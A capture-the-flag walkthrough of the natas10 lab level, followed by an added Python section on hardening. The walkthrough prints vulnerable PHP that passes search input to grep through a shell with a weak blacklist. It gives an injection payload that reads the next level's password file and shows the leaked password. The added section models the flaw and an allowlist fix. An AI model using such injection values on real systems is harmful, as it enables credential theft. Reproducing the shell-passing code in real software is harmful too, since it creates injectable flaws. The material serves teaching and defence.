Natas10 - natas11

From JaxHax

Level Goal

For security reasons, we now filter on certain characters
Find words containing: [____________________________] [Search]
Output:

                               <View sourcecode>


Solution

I decided to click the <View sourcecode> link, which goes to http://natas10.natas.labs.overthewire.org/index-source.html. It gave me the following code:

<html>
   <head>
      <!-- This stuff in the header has nothing to do with the level -->
      <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
      <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
      <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
      <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
      <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
      <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script>
      <script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
      <script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script>
   </head>
   <body>
      <h1>natas10</h1>
      <div id="content">
         For security reasons, we now filter on certain characters<br/><br/>
         <form>
            Find words containing: <input name=needle>
            <input type=submit name=submit value=Search><br><br>
         </form>
 
 
         Output:
         <pre>
<?
$key = "";
 
if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}
 
if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
         </pre>
 
         <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
      </div>
   </body>
</html>


So the PHP code takes the user's search term and passes it to the command line to run a grep search against dictionary.txt. This time it checks the user value for the characters ;, | and & before dropping it into the shell command for execution...


This is a classic command injection bug! But now with filtering... Which is adorable...


However, because the filter is so narrow (it blocks only ;, | and &, never spaces or #), my solution for natas9 should still work here; just update the file name.


If we try:

'. /etc/natas_webpass/natas11 #'


The command that passthru() runs should then be:

'grep -i . /etc/natas_webpass/natas11 # dictionary.txt'


Let's try it:

For security reasons, we now filter on certain characters
Find words containing: [_. /etc/natas_webpass/natas11 #_] [Search]
Output:
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

                               <View sourcecode>

And we win son! Again... Without tweaking anything to deal with the filter. Our first solution was eloquent enough for two rounds. :-)
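The filter and the bypass above, modelled in Python as an added example that is not part of the natas10 page or the challenge code: the original blacklist beside an allowlist, a shell-style tokenisation showing why the # swallows dictionary.txt, and a search that never hands the needle to a shell. The sample needle is the walkthrough's payload; the file names are assumed to match the challenge.

```python
import re
import shlex
import subprocess

# Added example, not part of the natas10 page or the challenge code: a Python
# model of the PHP check above, showing why the blacklist fails and how a
# defender would rewrite the search. The sample needle is constructed.

DICTIONARY = "dictionary.txt"

def natas10_filter_allows(needle: str) -> bool:
    """The original check: only ';', '|' and '&' are rejected."""
    return re.search(r"[;|&]", needle) is None

def vulnerable_shell_argv(needle: str) -> list[str]:
    """Tokenise the string passthru() hands to /bin/sh, the way the shell does.

    comments=True treats '#' as a comment marker, so everything after it,
    including the intended dictionary.txt argument, is discarded.
    """
    return shlex.split(f"grep -i {needle} {DICTIONARY}", comments=True)

def hardened_filter_allows(needle: str) -> bool:
    """Allowlist: a dictionary search term needs only letters and digits.

    Space, '#', '/', '$', backticks and a leading '-' are all rejected, which
    closes both the comment trick and option injection into grep.
    """
    return re.fullmatch(r"[A-Za-z0-9]{1,64}", needle) is not None

def hardened_argv(needle: str) -> list[str]:
    """Build grep's argv directly, so no shell ever parses the needle.

    '--' ends option parsing, so the needle can never be read as a flag.
    """
    if not hardened_filter_allows(needle):
        raise ValueError("Input contains an illegal character!")
    return ["grep", "-i", "--", needle, DICTIONARY]

def hardened_search(needle: str) -> str:
    """Run the search without shell=True; grep sees exactly hardened_argv()."""
    return subprocess.run(hardened_argv(needle), capture_output=True, text=True).stdout

if __name__ == "__main__":
    payload = ". /etc/natas_webpass/natas11 #"  # the walkthrough's needle
    print("blacklist passes payload:", natas10_filter_allows(payload))
    print("shell would run:", vulnerable_shell_argv(payload))
    print("allowlist passes payload:", hardened_filter_allows(payload))
```

In the PHP original the equivalent fix is the same allowlist check plus escapeshellarg() on the needle and a -- before it, or better still, not going through a shell at all.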